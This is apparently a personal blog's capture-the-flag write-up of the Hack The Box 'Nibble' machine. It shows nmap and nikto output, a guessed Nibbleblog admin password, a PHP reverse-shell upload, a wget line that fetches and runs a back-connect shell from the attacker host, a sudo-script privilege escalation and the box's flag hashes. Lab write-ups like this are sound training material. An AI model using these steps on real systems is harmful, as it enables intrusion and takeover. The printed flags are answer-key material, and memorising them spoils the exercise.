Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Nibble Linux

Published on 28 Jul 2019
Great box, bit ctfish, again SUDO permissions get you root!

Recon

Nmap scan

CVEs_10.10.10.75.nmap 10.10.10.75
Nmap scan report for 10.10.10.75
Host is up (0.019s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| vulners:
| cpe:/a:apache:http_server:2.4.18:
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
|_ CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nikto scan privides with soe interesting directories

+ OSVDB-3268: /nibbleblog/admin/: Directory indexing found.
+ OSVDB-3092: /nibbleblog/admin.php: This might be interesting...
+ OSVDB-3092: /nibbleblog/admin/: This might be interesting...
+ OSVDB-3092: /nibbleblog/README: README file found.
+ OSVDB-3092: /nibbleblog/install.php: install.php file found.
+ OSVDB-3092: /nibbleblog/LICENSE.txt: License file found may identify site software.

Dirbuster scan

Nikto scan

Nibble blog

Exploitation

Nibbleblog 4.0.3 is vulnerable to Arbitrary File Upload. I tried bruteforcing the admin password with Hydra but not luck there. However I was successfull guessing the password: nibble

We upload a php reverse shell, under the tab plugins and get user shell as nibble

Shell is limited so we spawn a python shell

wget 10.10.14.25/tcp_pty_backconnect.py
python3 tcp_pty_backconnect.py

Privilege Escalation

We run LinuxEnum script and we got our potential priv-esc path

[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
 env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/
bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
 (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
[+] Possible sudo pwnage!
/home/nibbler/personal/stuff/monitor.sh

First we mkdir the /personal/stuff directory and the we create a file called monitor.sh

We echo “bash” to monitor.sh and chmod it 755 and we procceed to run it as sudo and finally we got root

sudo ./monitor.sh

FLAGS

 ROOT  "b6d745c0dfb6457c55591efc898ef88c" 
 USER  "b02ff32bb332deba49eeaed21152c8d8"

Related posts